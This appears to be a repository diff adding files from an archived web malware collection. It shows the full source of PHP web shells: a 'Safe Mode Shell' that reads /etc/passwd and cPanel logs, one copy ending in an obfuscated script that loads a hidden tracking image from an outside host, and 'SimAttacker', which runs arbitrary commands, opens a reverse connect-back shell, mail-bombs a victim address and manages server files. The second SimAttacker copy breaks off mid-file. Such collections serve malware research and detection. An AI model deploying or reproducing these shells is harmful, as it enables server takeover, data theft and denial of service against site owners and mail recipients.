$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.com>
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
?>

89
web-malware-collection-13-06-2012/PHP/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt Normal file
View file

@ -0,0 +1,89 @@
<head>
<meta http-equiv="Content-Language" content="en-us">
</head>
<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>
<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Verdana" size="5" color="#DADADA"><a href="? "><span style="color: #DADADA; text-decoration: none; font-weight:700"><font face="Times New Roman">Safe
Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
<form method="POST">
<p align="center"><input type="text" name="file" size="20">
<input type="submit" value="Open" name="B1"></p>
</form>
<form method="POST">
<p align="center"><select size="1" name="file">
<option value="/etc/passwd">Get /etc/passwd</option>
<option value="/var/cpanel/accounting.log">View cpanel logs</option>
<option value="/etc/syslog.conf">Syslog configuration</option>
<option value="/etc/hosts">Hosts</option>
</select> <input type="submit" value="Go" name="B1"></p>
</form>
<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by PHP Emperor<xb5@hotmail.com>
*/
echo "<head><title>Safe Mode Shell</title></head>";
$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "<font color=\"red\">ON (secure)</font>";
}
else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
echo("Safe-mode: $hsafemode");
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
echo("<br>");
echo("Open base dir: $hopenbasedir");
echo("<br>");
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n <B><CENTER><FONT
COLOR=\"RED\">PHP Emperor
xb5@hotmail.com</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.com>
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
?>

91
web-malware-collection-13-06-2012/PHP/Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.txt Normal file
View file

@ -0,0 +1,91 @@
<head>
<meta http-equiv="Content-Language" content="en-us">
</head>
<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>
<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Verdana" size="5" color="#DADADA"><a href="? "><span style="color: #DADADA; text-decoration: none; font-weight:700"><font face="Times New Roman">Safe
Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
<form method="POST">
<p align="center"><input type="text" name="file" size="20">
<input type="submit" value="Open" name="B1"></p>
</form>
<form method="POST">
<p align="center"><select size="1" name="file">
<option value="/etc/passwd">Get /etc/passwd</option>
<option value="/var/cpanel/accounting.log">View cpanel logs</option>
<option value="/etc/syslog.conf">Syslog configuration</option>
<option value="/etc/hosts">Hosts</option>
</select> <input type="submit" value="Go" name="B1"></p>
</form>
<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by PHP Emperor<xb5@hotmail.com>
*/
echo "<head><title>Safe Mode Shell</title></head>";
$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "<font color=\"red\">ON (secure)</font>";
}
else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
echo("Safe-mode: $hsafemode");
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
echo("<br>");
echo("Open base dir: $hopenbasedir");
echo("<br>");
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n <B><CENTER><FONT
COLOR=\"RED\">PHP Emperor
xb5@hotmail.com</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.com>
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
?>
<script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>

378
web-malware-collection-13-06-2012/PHP/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php Normal file
View file

@ -0,0 +1,378 @@
<?
//download Files Code
$fdownload=$_GET['fdownload'];
if ($fdownload <> "" ){
// path & file name
$path_parts = pathinfo("$fdownload");
$entrypath=$path_parts["basename"];
$name = "$fdownload";
$fp = fopen($name, 'rb');
header("Content-Disposition: attachment; filename=$entrypath");
header("Content-Length: " . filesize($name));
fpassthru($fp);
exit;
}
?>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
<style>
<!--
body { font-family: Tahoma; font-size: 8pt }
-->
</style>
</head>
<body>
<?
error_reporting(E_ERROR | E_WARNING | E_PARSE);
//File Edit
$fedit=$_GET['fedit'];
if ($fedit <> "" ){
$fedit=realpath($fedit);
$lines = file($fedit);
echo "<form action='' method='POST'>";
echo "<textarea name='savefile' rows=30 cols=80>" ;
foreach ($lines as $line_num => $line) {
echo htmlspecialchars($line);
}
echo "</textarea>
<input type='text' name='filepath' size='60' value='$fedit'>
<input type='submit' value='save'></form>";
$savefile=$_POST['savefile'];
$filepath=realpath($_POST['filepath']);
if ($savefile <> "")
{
$fp=fopen("$filepath","w+");
fwrite ($fp,"") ;
fwrite ($fp,$savefile) ;
fclose($fp);
echo "<script language='javascript'> close()</script>";
}
exit();
}
?>
<?
// CHmod - PRimission
$fchmod=$_GET['fchmod'];
if ($fchmod <> "" ){
$fchmod=realpath($fchmod);
echo "<center><br>
chmod for :$fchmod<br>
<form method='POST' action=''><br>
Chmod :<br>
<input type='text' name='chmod0' ><br>
<input type='submit' value='change chmod'>
</form>";
$chmod0=$_POST['chmod0'];
if ($chmod0 <> ""){
chmod ($fchmod , $chmod0);
}else {
echo "primission Not Allow change Chmod";
}
exit();
}
?>
<div align="center">
<table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
<tr>
<td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
<p align="center"><b>
<font face="Tahoma" size="2"><br>
</font>
<font color="#D2D200" face="Tahoma" size="2">
<span style="text-decoration: none">
<font color="#000000">
<a href="?id=fm&dir=<?
echo getcwd();
?>
">
<span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
<p align="center"><b><a href="?id=cmd">
<span style="text-decoration: none">
<font face="Tahoma" size="2" color="#000000">
CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
<p align="center"><b><a href="?id=fake-mail">
<font face="Tahoma" size="2" color="#000000">
<span style="text-decoration: none">Fake mail</span></font></a></b></p>
<p align="center"><b>
<font face="Tahoma" size="2" color="#000000">
<a href="?id=cshell">
<span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
<p align="center"><b>
<font color="#000000" face="Tahoma" size="2">
<a href="?id=">
<span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
<p>&nbsp;<p align="center">&nbsp;</td>
<td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
<?
//*******************************************************
//Start Programs About US
$id=$_GET['id'];
if ($id=="") {
echo "
<font face='Arial Black' color='#808080' size='1'>
***************************************************************************<br>
&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
&nbsp;Programer : Hossein Asgary <br>
&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group <br>
&nbsp;please : If you find bug or problems in program , tell me by : <br>
&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
Enjoy :) [Only 4 Best Friends ] <br>
***************************************************************************</font></span></p>
";
echo "<font color='#333333' size='2'>OS :". php_uname();
echo "<br>IP :".
($_SERVER['REMOTE_ADDR']);
echo "</font>";
}
//************************************************************
//cmd-command line
$cmd=$_POST['cmd'];
if($id=="cmd"){
$result=shell_exec("$cmd");
echo "<br><center><h3> CMD ExeCute </h3></center>" ;
echo "<center>
<textarea rows=20 cols=70 >$result</textarea><br>
<form method='POST' action=''>
<input type='hidden' name='id' value='cmd'>
<input type='text' size='80' name='cmd' value='$cmd'>
<input type='submit' value='cmd'><br>";
}
//********************************************************
//fake mail = Use victim server 4 DOS - fake mail
if ( $id=="fake-mail"){
error_reporting(0);
echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
echo "<center><form method='post' action=''>
Victim Mail :<br><input type='text' name='to' ><br>
Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
Comments:
<br>
<textarea rows='10' cols=50 name='Comments' ></textarea><br>
<input type='submit' value='Send Mail Strm ' >
</form></center>";
//send Storm Mail
$to=$_POST['to'];
$nom=$_POST['nom'];
$Comments=$_POST['Comments'];
if ($to <> "" ){
for ($i = 0; $i < $nom ; $i++){
$from = rand (71,1020000000)."@"."Attacker.com";
$subject= md5("$from");
mail($to,$subject,$Comments,"From:$from");
echo "$i is ok";
}
echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
}
}
//********************************************************
//Connect Back -Firewall Bypass
if ($id=="cshell"){
echo "<br>Connect back Shell , bypass Firewalls<br>
For user :<br>
nc -l -p 1019 <br>
<hr>
<form method='POST' action=''><br>
Your IP & BindPort:<br>
<input type='text' name='mip' >
<input type='text' name='bport' size='5' value='1019'><br>
<input type='submit' value='Connect Back'>
</form>";
$mip=$_POST['mip'];
$bport=$_POST['bport'];
if ($mip <> "")
{
$fp=fsockopen($mip , $bport , $errno, $errstr);
if (!$fp){
$result = "Error: could not open socket connection";
}
else {
fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n");
while(!feof($fp)){
fputs ($fp," bash # ");
$result= fgets ($fp, 4096);
$message=`$result`;
fputs ($fp,"--> ".$message."\n");
}
fclose ($fp);
}
}
}
//********************************************************
//Spy File Manager
$homedir=getcwd();
$dir=realpath($_GET['dir'])."/";
if ($id=="fm"){
echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir
&nbsp;<b>
<form action='' method='GET'>
&nbsp;Path:</b>
<input type='hidden' name='id' value='fm'>
<input type='text' name='dir' size='80' value='$dir'>
<input type='submit' value='dir'>
</form>
<br>";
echo "
<div align='center'>
<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
<tr>
<td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
<td height='28' width='82' align='center'>
<font color='#000080' size='2'><b>Size KByte</b></font></td>
<td height='28' width='83' align='center'>
<font color='#008000' size='2'><b>Download</b></font></td>
<td height='28' width='66' align='center'>
<font color='#FF9933' size='2'><b>Edit</b></font></td>
<td height='28' width='75' align='center'>
<font color='#999999' size='2'><b>Chmod</b></font></td>
<td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
</tr>";
if (is_dir($dir)){
if ($dh=opendir($dir)){
while (($file = readdir($dh)) !== false) {
$fsize=round(filesize($dir . $file)/1024);
echo "
<tr>
<th width='250' height='22' align='left' nowrap>";
if (is_dir($dir.$file))
{
echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
}
else {
echo "<font size='2' color='#666666'>&nbsp;$file ";
}
echo "</a></font></th>
<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
if (is_file($dir.$file))
{
echo "$fsize";
}
else {
echo "&nbsp; ";
}
echo "
</b></font></td>
<td width='103' align='center' nowrap>";
if (is_file($dir.$file)){
if (is_readable($dir.$file)){
echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
}else {
echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
}
}else {
echo "&nbsp;";
}
echo "
</a></font></td>
<td width='77' align='center' nowrap>";
if (is_file($dir.$file))
{
if (is_readable($dir.$file)){
echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
}else {
echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
}
}else {
echo "&nbsp;";
}
echo "
</a></font></td>
<td width='86' align='center' nowrap>";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
echo "<font size='1' color='#999999'>Dont in windows";
}
else {
echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
}
echo "</a></font></td>
<td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
</tr>
";
}
closedir($dh);
}
}
echo "</table>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='hidden' name='MAX_FILE_SIZE' value='300000' />
Send this file: <input name='userfile' type='file' />
<inpt type='hidden' name='Fupath' value='$dir'>
<input type='submit' value='Send File' />
</form>
</div>";
}
//Upload Files
$rpath=$_GET['dir'];
if ($rpath <> "") {
$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
print "<pre>";
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
echo "<script language='javascript'> history.back(2)</script>";
}
}
//file deleted
$frpath=$_GET['fdelete'];
if ($frpath <> "") {
if (is_dir($frpath)){
$matches = glob($frpath . '/*.*');
if ( is_array ( $matches ) ) {
foreach ( $matches as $filename) {
unlink ($filename);
rmdir("$frpath");
echo "<script language='javascript'> alert('Success! Please refresh')</script>";
echo "<script language='javascript'> history.back(1)</script>";
}
}
}
else{
echo "<script language='javascript'> alert('Success! Please refresh')</script>";
unlink ("$frpath");
echo "<script language='javascript'> history.back(1)</script>";
exit(0);
}
}
?>
</td>
</tr>
<tr>
<td style="border: 1px dotted #FFCC66">
<p align="center"><font color="#666666" size="1" face="Tahoma"><br>
Copyright 2004-Simorgh Security<br>
Hossein-Asgari<br>
</font><font color="#c0c0c0" size="1" face="Tahoma">
<a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
<font color="#666666">www.simorgh-ev.com</font></a></font></td>
</tr>
</table>
</div>
</body>
</html>

378
web-malware-collection-13-06-2012/PHP/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt Normal file
View file

@ -0,0 +1,378 @@
<?
//download Files Code
$fdownload=$_GET['fdownload'];
if ($fdownload <> "" ){
// path & file name
$path_parts = pathinfo("$fdownload");
$entrypath=$path_parts["basename"];
$name = "$fdownload";
$fp = fopen($name, 'rb');
header("Content-Disposition: attachment; filename=$entrypath");
header("Content-Length: " . filesize($name));
fpassthru($fp);
exit;
}
?>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
<style>
<!--
body { font-family: Tahoma; font-size: 8pt }
-->
</style>
</head>
<body>
<?
error_reporting(E_ERROR | E_WARNING | E_PARSE);
//File Edit
$fedit=$_GET['fedit'];
if ($fedit <> "" ){
$fedit=realpath($fedit);
$lines = file($fedit);
echo "<form action='' method='POST'>";
echo "<textarea name='savefile' rows=30 cols=80>" ;
foreach ($lines as $line_num => $line) {
echo htmlspecialchars($line);
}
echo "</textarea>
<input type='text' name='filepath' size='60' value='$fedit'>
<input type='submit' value='save'></form>";
$savefile=$_POST['savefile'];
$filepath=realpath($_POST['filepath']);
if ($savefile <> "")
{
$fp=fopen("$filepath","w+");
fwrite ($fp,"") ;
fwrite ($fp,$savefile) ;
fclose($fp);
echo "<script language='javascript'> close()</script>";
}
exit();
}
?>
<?
// CHmod - PRimission
$fchmod=$_GET['fchmod'];
if ($fchmod <> "" ){
$fchmod=realpath($fchmod);
echo "<center><br>
chmod for :$fchmod<br>
<form method='POST' action=''><br>
Chmod :<br>
<input type='text' name='chmod0' ><br>
<input type='submit' value='change chmod'>
</form>";
$chmod0=$_POST['chmod0'];
if ($chmod0 <> ""){
chmod ($fchmod , $chmod0);
}else {
echo "primission Not Allow change Chmod";
}
exit();
}
?>
<div align="center">
<table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
<tr>
<td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
<p align="center"><b>
<font face="Tahoma" size="2"><br>
</font>
<font color="#D2D200" face="Tahoma" size="2">
<span style="text-decoration: none">
<font color="#000000">
<a href="?id=fm&dir=<?
echo getcwd();
?>
">
<span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
<p align="center"><b><a href="?id=cmd">
<span style="text-decoration: none">
<font face="Tahoma" size="2" color="#000000">
CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
<p align="center"><b><a href="?id=fake-mail">
<font face="Tahoma" size="2" color="#000000">
<span style="text-decoration: none">Fake mail</span></font></a></b></p>
<p align="center"><b>
<font face="Tahoma" size="2" color="#000000">
<a href="?id=cshell">
<span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
<p align="center"><b>
<font color="#000000" face="Tahoma" size="2">
<a href="?id=">
<span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
<p>&nbsp;<p align="center">&nbsp;</td>
<td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
<?
//*******************************************************
//Start Programs About US
$id=$_GET['id'];
if ($id=="") {
echo "
<font face='Arial Black' color='#808080' size='1'>
***************************************************************************<br>
&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
&nbsp;Programer : Hossein Asgary <br>
&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group <br>
&nbsp;please : If you find bug or problems in program , tell me by : <br>
&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
Enjoy :) [Only 4 Best Friends ] <br>
***************************************************************************</font></span></p>
";
echo "<font color='#333333' size='2'>OS :". php_uname();
echo "<br>IP :".
($_SERVER['REMOTE_ADDR']);
echo "</font>";
}
//************************************************************
//cmd-command line
$cmd=$_POST['cmd'];
if($id=="cmd"){
$result=shell_exec("$cmd");
echo "<br><center><h3> CMD ExeCute </h3></center>" ;
echo "<center>
<textarea rows=20 cols=70 >$result</textarea><br>
<form method='POST' action=''>
<input type='hidden' name='id' value='cmd'>
<input type='text' size='80' name='cmd' value='$cmd'>
<input type='submit' value='cmd'><br>";
}
//********************************************************
//fake mail = Use victim server 4 DOS - fake mail
if ( $id=="fake-mail"){
error_reporting(0);
echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
echo "<center><form method='post' action=''>
Victim Mail :<br><input type='text' name='to' ><br>
Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
Comments:
<br>
<textarea rows='10' cols=50 name='Comments' ></textarea><br>
<input type='submit' value='Send Mail Strm ' >
</form></center>";
//send Storm Mail
$to=$_POST['to'];
$nom=$_POST['nom'];
$Comments=$_POST['Comments'];
if ($to <> "" ){
for ($i = 0; $i < $nom ; $i++){
$from = rand (71,1020000000)."@"."Attacker.com";
$subject= md5("$from");
mail($to,$subject,$Comments,"From:$from");
echo "$i is ok";
}
echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
}
}
//********************************************************
//Connect Back -Firewall Bypass
if ($id=="cshell"){
echo "<br>Connect back Shell , bypass Firewalls<br>
For user :<br>
nc -l -p 1019 <br>
<hr>
<form method='POST' action=''><br>
Your IP & BindPort:<br>
<input type='text' name='mip' >
<input type='text' name='bport' size='5' value='1019'><br>
<input type='submit' value='Connect Back'>
</form>";
$mip=$_POST['mip'];
$bport=$_POST['bport'];
if ($mip <> "")
{
$fp=fsockopen($mip , $bport , $errno, $errstr);
if (!$fp){
$result = "Error: could not open socket connection";
}
else {
fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n");
while(!feof($fp)){
fputs ($fp," bash # ");
$result= fgets ($fp, 4096);
$message=`$result`;
fputs ($fp,"--> ".$message."\n");
}
fclose ($fp);
}
}
}
//********************************************************
//Spy File Manager
$homedir=getcwd();
$dir=realpath($_GET['dir'])."/";
if ($id=="fm"){
echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir
&nbsp;<b>
<form action='' method='GET'>
&nbsp;Path:</b>
<input type='hidden' name='id' value='fm'>
<input type='text' name='dir' size='80' value='$dir'>
<input type='submit' value='dir'>
</form>
<br>";
echo "
<div align='center'>
<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
<tr>
<td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
<td height='28' width='82' align='center'>
<font color='#000080' size='2'><b>Size KByte</b></font></td>
<td height='28' width='83' align='center'>
<font color='#008000' size='2'><b>Download</b></font></td>
<td height='28' width='66' align='center'>
<font color='#FF9933' size='2'><b>Edit</b></font></td>
<td height='28' width='75' align='center'>
<font color='#999999' size='2'><b>Chmod</b></font></td>
<td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
</tr>";
if (is_dir($dir)){
if ($dh=opendir($dir)){
while (($file = readdir($dh)) !== false) {
$fsize=round(filesize($dir . $file)/1024);
echo "
<tr>
<th width='250' height='22' align='left' nowrap>";
if (is_dir($dir.$file))
{
echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
}
else {
echo "<font size='2' color='#666666'>&nbsp;$file ";
}
echo "</a></font></th>
<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
if (is_file($dir.$file))
{
echo "$fsize";
}
else {
echo "&nbsp; ";
}
echo "
</b></font></td>
<td width='103' align='center' nowrap>";
if (is_file($dir.$file)){
if (is_readable($dir.$file)){
